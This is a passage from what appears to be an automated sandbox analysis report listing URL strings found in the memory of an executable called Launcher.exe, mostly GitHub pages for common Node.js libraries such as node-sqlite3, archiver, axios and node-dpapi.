        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghost.org).
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
        Source: Launcher.exe, 00000000.00000003.1348076606.0000017525D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer/issues
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeRX
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DigitalBrainJS)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Mithgol)
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify/issues
        Source: Launcher.exe, 00000000.00000003.1383139729.00000105F8501000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1314370569.00000175265D4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/SheetJS/js-crc32/issues
        Source: Launcher.exe, 00000000.00000003.1314370569.0000017526604000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1374063380.0000006D5FA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path
        Source: Launcher.exe, 00000000.00000003.1314370569.0000017526604000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1374063380.0000006D5FA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path/issues
        Source: Launcher.exe, 00000000.00000003.1314370569.00000175265F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings
        Source: Launcher.exe, 00000000.00000003.1314370569.00000175265F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings/issues
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate/issues
        Source: Launcher.exe, 00000000.00000003.1397530605.00000175262C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1350482331.0000017529435000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342373897.0000017526023000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3
        Source: Launcher.exe, 00000000.00000003.1350482331.0000017529435000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1339133459.000001752625E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1401215592.0000017526024000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342373897.0000017526023000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3.git
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/blob/b05f4594cf8b0de64743561fcd2cfe6f4571754d/CHANGELOG.md)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/releases)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API#databaseloadextensionpath-callback)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/workflows/CI/badge.svg?branch=master)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
        Source: Launcher.exe, 00000000.00000003.1248030209.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Yqnn/node-readdir-glob
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175260B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit#readme
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175260B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit.git
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175260B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit/issues
        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1304173056.00000175265F0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils#readme
        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1304173056.00000175265F0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils.git
        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils.gitA
        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1304173056.00000175265F8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1304173056.00000175265FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/blob/master/LICENSE
        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1304173056.00000175265F0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/issues
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526237000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526237000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver.git
        Source: Launcher.exe, 00000000.00000003.1256759287.0000017526128000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1298415150.00000175263A8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1289642120.0000017526350000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526247000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526237000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1372258204.000000E02B141000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262B7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1248030209.00000175261DD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.000001752629B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262A7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752629B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1254540287.0000017526128000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1316418767.00000175263A8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1256384195.0000017526275000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.000001752628B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE
        Source: Launcher.exe, 00000000.00000003.1277593652.00000175264F4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1367343435.000003C3E8601000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1277593652.00000175264DC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264F4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE-MIT
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526237000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/issues
        Source: Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.0000017526283000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons
        Source: Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons.git
        Source: Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons.gitA
        Source: Launcher.exe, 00000000.00000003.1284664317.00000175262BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260D9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262A7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260CD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262B7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262B3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380397506.0000031680DC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260DD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260D9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260B9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.00000175262A7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260B5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1309778726.00000175260D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260AD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260D5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286546243.00000175260A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/blob/master/LICENSE-MIT
        Source: Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.00000175262A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/issues
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.git
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.gitA
        Source: Launcher.exe, 00000000.00000003.1383139729.00000105F8501000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1301065927.00000175265D0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1296492956.00000175265CC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/blob/master/LICENSE-MIT
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/issues
        Source: Launcher.exe, 00000000.00000003.1310888871.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream
        Source: Launcher.exe, 00000000.00000003.1310888871.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream.git
        Source: Launcher.exe, 00000000.00000003.1378727902.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.0000017526283000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.0000017526283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/blob/master/LICENSE
        Source: Launcher.exe, 00000000.00000003.1310888871.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/artiz)
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1517605958.000001752621B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1517605958.000001752621B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/issues
        Source: Launcher.exe, 00000000.00000003.1517605958.000001752622B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
        Source: Launcher.exe, 00000000.00000003.1517605958.000001752622B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1540458234.00000175261FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1568111751.00000175261FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
        Source: Launcher.exe, 00000000.00000003.1510064798.00000105F8509000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-liteP_;
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/audriusk)
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/axios/axios.git
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/axios/axios/issues
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.00000175260CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/axios/axios/issues/69
        Source: Launcher.exe, 00000000.00000003.1493022130.0000020C2CC40000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1499163498.0000017526420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bradhugh/node-dpapi
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSE
        Source: Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSEA
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args/issues
        Source: Launcher.exe, 00000000.00000003.1252239907.00000175260B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/caolan/async.git
        Source: Launcher.exe, 00000000.00000003.1252239907.00000175260B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/caolan/async/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/carter-thaxton)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515621239.00000175261D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/cryptocoinjs/base-x
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/daniellockyer)
        Source: Launcher.exe, 00000000.00000003.1545921007.000001752609F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1545921007.0000017526099000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1539875535.0000017526094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dchest/tweetnacl-js
        Source: Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge
        Source: Launcher.exe, 00000000.00000003.1533437253.00000175264DC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1533437253.000001752644B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/blob/cbebca3780658703d925b61b2caffb1d263a6c1d/LICENSE
        Source: Launcher.exe, 00000000.00000003.1539875535.0000017526094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/blob/master/lib/asn1.js#L542
        Source: Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/issues
        Source: Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forgeA
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/electron/electron-rebuild)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
        Source: Launcher.exe, 00000000.00000003.1233378920.000001752618F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/felixge/node-delayed-stream
